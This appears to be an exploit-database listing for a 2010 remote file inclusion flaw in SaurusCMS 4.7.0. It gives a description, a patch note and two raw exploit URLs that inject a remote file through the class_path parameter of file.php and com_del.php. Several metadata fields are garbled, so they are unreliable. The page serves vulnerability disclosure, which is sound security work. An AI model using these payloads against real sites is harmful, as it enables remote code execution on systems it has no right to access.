header-logo
Suggest Exploit
vendor:
SaurusCMSupdate4.7.0
by:
LoSt.HaCkEr
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: SaurusCMSupdate4.7.0
Affected Version From: 4.7.0
Affected Version To: 4.7.0
Patch Exists: Yes
Related CWE: هكر المسيب
CPE: a:saurus:saurus_cms_upd4.7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

SaurusCMSupdate4.7.0 Remote File Include

A vulnerability exists in SaurusCMSupdate4.7.0 which allows an attacker to include a remote file via the class_path parameter in the file.php and com_del.php scripts. This can be exploited to execute arbitrary PHP code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of SaurusCMSupdate4.7.0.
Source

Exploit-DB raw data:

# Exploit Title: [SaurusCMSupdate4.7.0 Remote File Include ]
# Date: [11-8-2010]
# Author: LoSt.HaCkEr
# Software Link: [http://www.brothersoft.com/saurus-cms-download-17626.html]
# Version: [v 4.7.0]
# Tested on: [Windows XP]
# CVE : [هكر المسيب]
#____Contact__LoSt.HaCkEr[at]yahoo[dot]com

____________________________________
Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/file.php?class_path=[EV!L]
____________________________________________
Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/com_del.php?class_path=[EV!L]
____________________________________________
A special tribute to:

DannY.iRaQi - TeaM iRaQ HaCkers

Navigation

Suggest Exploit

Services By CQR